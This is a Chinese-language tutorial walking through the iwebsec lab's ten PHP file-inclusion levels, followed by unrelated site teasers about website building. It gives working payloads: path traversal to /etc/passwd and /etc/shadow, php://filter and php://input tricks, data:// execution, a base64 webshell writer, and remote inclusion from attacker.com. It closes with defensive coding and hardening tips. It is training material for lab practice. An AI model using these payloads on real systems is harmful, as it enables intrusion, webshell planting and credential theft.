PHP 文件包含漏洞实战:iwebsec 靶场 10 关核心利用手法与 3 类伪协议解析

发布时间:2026/7/8 20:30:52
PHP 文件包含漏洞实战:iwebsec 靶场 10 关核心利用手法与 3 类伪协议解析 PHP 文件包含漏洞实战iwebsec 靶场 10 关核心利用手法与 3 类伪协议解析在 Web 安全领域文件包含漏洞File Inclusion Vulnerability一直是渗透测试中的高频攻击点。iwebsec 靶场作为国内知名的 Web 安全实战平台其文件包含模块设计了 10 个由浅入深的关卡全面覆盖了本地文件包含LFI、远程文件包含RFI、Session 文件包含以及 PHP 伪协议利用等核心攻击手法。本文将基于实战视角系统性地拆解这 10 个关卡的技术要点并深入分析 3 类关键伪协议的底层原理与创新利用方式。1. 靶场环境搭建与基础概念1.1 Docker 靶场快速部署使用官方提供的 Docker 镜像可在 30 秒内完成环境搭建docker pull iwebsec/iwebsec:latest docker run -d -p 8001:80 --name iwebsec iwebsec/iwebsec访问http://localhost:8001即可进入靶场界面文件包含漏洞模块路径为/fi/目录。1.2 文件包含漏洞本质当 PHP 代码使用以下函数动态包含文件时若未对参数进行严格过滤则可能引发漏洞include($_GET[file]); require_once($path.header.php);攻击者通过控制文件路径参数可实现读取服务器敏感文件/etc/passwd执行任意 PHP 代码WebShell触发反序列化漏洞漏洞类型对比表类型触发条件典型危害本地文件包含(LFI)能访问服务器本地文件敏感信息泄露、代码执行远程文件包含(RFI)allow_url_includeOn直接获取服务器控制权Session 文件包含Session 内容可控权限提升、持久化后门2. 基础关卡本地文件包含实战2.1 关卡 1直接文件包含漏洞代码// fi/01.php $filename $_GET[filename]; include($filename);利用方式http://localhost:8001/fi/01.php?filename../../../../etc/passwd关键技巧使用../进行目录遍历Linux 常见敏感文件路径/etc/passwd # 用户账户信息 /proc/self/environ # 环境变量 /var/log/apache2/access.log # Web日志2.2 关卡 2过滤绕过技术当系统过滤/字符时可采用以下手法方法一URL 编码绕过?filename..%2f..%2f..%2fetc%2fpasswd方法二超长路径截断PHP5.2.8# 生成 4096 个字符的路径 payload ./*2048 etc/passwd3. 高阶利用Session 与伪协议3.1 关卡 3Session 文件包含攻击链构建发现 Session 可控点/fi/03.php?iwebsec?php phpinfo();?获取 Session ID// Chrome DevTools - Application - Cookies document.cookie.match(/PHPSESSID([^;])/)[1]包含 Session 文件/fi/01.php?filename../../../../var/lib/php/sessions/sess_abc123Session 文件路径规律默认路径/var/lib/php/sessions/命名规则sess_[PHPSESSID]3.2 关卡 6-8PHP 伪协议深度利用3.2.1 php://filter 协议源码读取技巧/fi/06.php?filenamephp://filter/convert.base64-encode/resourceindex.php提示Base64 编码可避免 PHP 代码被直接执行过滤器链组合应用# 多重编码绕过WAF payload php://filter/convert.iconv.UTF-8.UTF-7|convert.base64-encode/resourceconfig.php3.2.2 php://input 协议POST 数据执行GET /fi/07.php?filenamephp://input HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded ?php system(id);?木马写入技巧?php file_put_contents(shell.php, base64_decode(PD9waHAgZXZhbCgkX1BPU1RbJ2MnXSk7));4. 远程文件包含与特殊协议4.1 关卡 4-5RFI 利用条件必要配置检查// php.ini 关键配置 allow_url_fopen On allow_url_include On绕过域名限制技巧/fi/05.php?filenamehttp://attacker.com/shell.txt? /fi/05.php?filenamehttp://127.0.0.1:8080/bypass.txt%234.2 关卡 9-10data:// 与 file:// 协议data:// 代码执行/fi/10.php?filenamedata://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpOwfile:// 绝对路径读取/fi/09.php?filenamefile:///etc/shadow5. 防御方案与实战建议5.1 安全编码规范// 白名单校验 $allowed [header.php, footer.php]; if(in_array($file, $allowed)) { include($file); } // 路径固定化 define(BASE_DIR, /var/www/includes/); include(BASE_DIR . $file);5.2 服务器加固措施PHP 配置优化allow_url_include Off open_basedir /var/www/html:/tmp文件权限控制chmod -R 750 /var/www chown -R www-data:www-data /var/www在实战渗透测试中文件包含漏洞往往与文件上传、SQL 注入等漏洞形成组合攻击链。建议在 iwebsec 靶场中尝试以下进阶练习通过 LFI 读取数据库配置文件结合日志文件包含实现无文件攻击利用 phar:// 协议触发反序列化

相关新闻

Frida + Objection 自动化Hook实战:1条命令绕过App SSL Pinning证书绑定

Frida + Objection 自动化Hook实战:1条命令绕过App SSL Pinning证书绑定

Frida与Objection自动化Hook实战:SSL Pinning绕过技术深度解析 1. 移动安全测试中的SSL Pinning挑战 在移动应用安全测试领域,SSL Pinning(证书绑定)技术已成为开发者保护数据传输安全的重要手段。这项技术通过将服务器证书或公钥…

发布时间:2026/7/8 20:30:14
河北建设厅网站怎么搜索文件?别瞎找,这招最管用!

河北建设厅网站怎么搜索文件?别瞎找,这招最管用!

说实话,找文件这事儿 真挺让人头大的。特别是那种 带红头文件的 看着就头疼。你是不是也遇到过 明明知道有这文件 就是死活搜不到?别急,今天咱就 把河北建设厅网站怎么搜索文件 这事儿,掰开了揉碎了说。先别急着点那个 大大的搜索框。很多人第一步就错了。你直接输个“通知…

发布时间:2026/7/8 20:28:22
网站建设 豫icp备怎么搞?老鸟掏心窝子分享真实价格与避坑指南

网站建设 豫icp备怎么搞?老鸟掏心窝子分享真实价格与避坑指南

做网站最怕什么?怕被坑钱还拿不到东西,怕备案被卡半年动不了。这篇文章不整虚的,直接告诉你找外包到底该花多少钱,怎么审合同,以及那个让人头秃的备案流程怎么快速过。先说钱。市面上报价从几百到几万都有,水太深。如果你只是要个展示型企业官网,别信那些说几百块全包还…

发布时间:2026/7/8 20:27:21
关于建设门户网站的通知:别瞎折腾,这几点才是核心

关于建设门户网站的通知:别瞎折腾,这几点才是核心

说实话,看到“关于建设门户网站的通知”这几个字,我第一反应是头大。以前那种堆砌新闻、挂满广告的老式门户,早就不流行了。现在做网站,要是还按那个套路走,纯属浪费钱。上周有个做建材的朋友找我,说公司要搞个官网,预算给了十万。我一看他之前的方案,好家伙,首页全是…

发布时间:2026/7/8 21:34:27
涿州买房急用?教你怎么在涿州市查建设局网站看楼盘底细

涿州买房急用?教你怎么在涿州市查建设局网站看楼盘底细

哎哟喂,真不是吓唬你,最近这楼市闹得人心惶惶的,尤其是咱们涿州这边,好多朋友拿着钱不敢往房子上砸,怕踩雷。我有个哥们儿,前阵子看中个盘,销售吹得天花乱坠,说手续全齐。结果呢?差点交定金才发现人家连预售证都悬乎。这时候你就得学聪明了,别光听销售那张嘴,得自己…

发布时间:2026/7/8 21:34:17
坑梓网站建设哪家好?别被忽悠,看这几点就懂行

坑梓网站建设哪家好?别被忽悠,看这几点就懂行

坑梓网站建设哪家好?这问题问得实在。别听那些吹得天花乱坠的,咱直接说干货。看完这篇,你心里就有底了,知道怎么挑,怎么避坑。先说个大实话。坑梓这边,做网站的团队不少。但靠谱的,真不多。很多人问坑梓网站建设哪家好,其实是因为怕被坑。怕钱花了,网站丑得没法看。怕…

发布时间:2026/7/8 21:33:51
别瞎折腾了,找有口碑的江苏网站建设公司到底看啥门道?

别瞎折腾了,找有口碑的江苏网站建设公司到底看啥门道?

本文关键词:有口碑的江苏网站建设说实话,前两天有个做五金的老哥找我,急得嗓子都哑了。他说之前找的那家所谓的“大公司”,给他做的网站丑得像个上世纪的网页,打开慢得像蜗牛爬,关键是客户咨询量为零,钱却花了不少。我听完直摇头,这哪是建站,这简直是给企业埋雷。咱江…

发布时间:2026/7/8 21:33:49
别在百度搜那些野鸡网站了!认准河南省建设科技协会网站才是正解

别在百度搜那些野鸡网站了!认准河南省建设科技协会网站才是正解

你是不是经常为了查个资质、找个专家,或者想确认某个项目是不是正规备案,结果搜出来一堆乱七八糟的广告和山寨网页?那种看着像官方,点进去全是弹窗,最后连个联系方式都找不到的感觉,真的太搞心态了。今天这篇文,就是专门来帮你避坑的,教你怎么一眼识别真假,直接锁定河…

发布时间:2026/7/8 21:33:31
跑工地累成狗?河南省建设监理网站这破事儿你得门儿清,别等出事才拍大腿

跑工地累成狗?河南省建设监理网站这破事儿你得门儿清,别等出事才拍大腿

刚在郑州北环那边被大太阳晒得眼冒金星,手里攥着那张皱巴巴的图纸,心里头那个火啊,蹭蹭往上冒。干咱们这行,风吹日晒是常态,但最怕的不是累,是心里没底。特别是那些刚入行的小年轻,或者是想换个环境的老油条,总爱问:到底去哪查那些个乱七八糟的信息?别整那些虚头巴脑…

发布时间:2026/7/8 21:32:12
别光看栖霞建设官方网站,买房这事儿得自己多长点心

别光看栖霞建设官方网站,买房这事儿得自己多长点心

前两天有个朋友急匆匆找我,说在栖霞建设官方网站上看了几个盘,觉得参数挺漂亮,想赶紧下手。我让他把户型图发我看看,他回了一句“网上说的都那样,还能有假?”我差点没忍住笑出声。现在的房地产营销,那是真的卷,网页做得光鲜亮丽,VR看房做得跟真的一样,但真到了签合同…

发布时间:2026/7/8 0:00:00
渭南网站建设wifi 避坑指南:别让你的门店流量在离线时白白流失

渭南网站建设wifi 避坑指南:别让你的门店流量在离线时白白流失

很多老板花大价钱搞了个高大上的官网,结果访客来了转两圈就走了。这钱花得冤不冤?其实问题不在页面丑,而在你没接住流量。这篇内容直接告诉你,怎么通过优化网站细节,把过客变成回头客,顺便聊聊怎么利用本地生活痛点提升转化率。咱们先说个扎心的事实。你花几千块请人做的…

发布时间:2026/7/8 0:00:34
搞大数据比赛网站建设,别光看模板,这坑我踩了个遍

搞大数据比赛网站建设,别光看模板,这坑我踩了个遍

凌晨三点,盯着屏幕里那个崩了又崩的后台,我差点把键盘砸了。不是夸张,是真的想砸。为了搞这个大数据比赛网站建设,我头发掉了一把,钱烧了一堆,最后发现,最难的从来不是代码,而是人心。很多人觉得,搞个比赛网站,找个外包,或者套个现成的模板,两天就能上线。天真。真…

发布时间:2026/7/8 0:02:36
做个人信息管理网站建设,这3个坑我踩了七年,你千万别再跳

做个人信息管理网站建设,这3个坑我踩了七年,你千万别再跳

做了七年建站,见过太多老板花大钱买模板,最后发现根本没法用。特别是现在大家都讲究数据隐私,想搞个个人信息管理网站建设,结果越搞越乱。这篇文不整虚的,直接说怎么把这套系统落地,让你自己的数据真正听话。先说个真事儿。去年有个做自由职业的朋友找我,他说想建个网站…

发布时间:2026/7/8 14:09:51
杨凌规划建设局网站怎么查最新规划?老杨说点大实话

杨凌规划建设局网站怎么查最新规划?老杨说点大实话

杨凌规划建设局网站你是不是也遇到过这种情况?想看看自家旁边要修路,还是建公园。翻遍了手机,搜出来的全是几年前的旧闻。或者好不容易找到个入口,页面加载慢得像蜗牛。心里那个急啊,真的,懂的人都懂。我是老杨,在杨凌混了十几年,跟这行打交道不少。今天不跟你扯那些虚…

发布时间:2026/7/8 12:11:30
杭州网站建设 seo 避坑指南:别被那些只会套模板的忽悠了

杭州网站建设 seo 避坑指南:别被那些只会套模板的忽悠了

昨天半夜两点,我还在改一个客户的后台,咖啡都凉透了。这哥们儿是做机械配件的,在余杭那边,找的前一家公司花了八千块做了个站,结果上线一个月,百度连个影子都没有。他急得给我打电话,说是不是被黑了。我让他把链接发过来,打开一看,好家伙,那代码乱得跟刚被猫抓过的毛…

发布时间:2026/7/8 4:42:51
建站7年才悟出的网站建设思路,别再花冤枉钱了

建站7年才悟出的网站建设思路,别再花冤枉钱了

做建站这行整整7年了。 见过太多老板花几万块, 最后做出来的网站像个垃圾场。 今天不整那些虚头巴脑的术语。 就聊聊我踩过的坑, 和真正能落地的网站建设思路。很多老板一上来就问: “多少钱能做个高大上的?” 我通常直接劝退。 因为方向错了, 你给再多钱也是打水漂。 真正…

发布时间:2026/7/8 9:56:13
合肥的网站建设避坑指南:别被低价忽悠,这3个细节决定生死

合肥的网站建设避坑指南:别被低价忽悠,这3个细节决定生死

做企业官网最怕什么?不是技术难,是交钱后没人管,或者上线一个月连个访客都没有。这篇东西不扯虚的,直接告诉你怎么在合肥找个靠谱的团队,或者自己怎么避坑。先说个大实话,我在合肥混这行五年多,见过太多老板因为贪便宜吃大亏。你去百度搜“合肥的网站建设”,出来一堆报…

发布时间:2026/7/8 3:06:40
别被忽悠了!德州网站建设那些坑,我拿真金白银换来的教训

别被忽悠了!德州网站建设那些坑,我拿真金白银换来的教训

做这行久了,心里就憋着一股火。每次看到客户拿着网上抄来的模板,问我能不能做成“苹果官网”那种效果。我就想笑。真的,太想笑了。今天咱不整那些虚头巴脑的专业术语。就聊聊德州网站建设里,那些让人头秃的真实事儿。我有个客户,老张。他是做德州本地建材的,实在人。当初…

发布时间:2026/7/8 11:22:51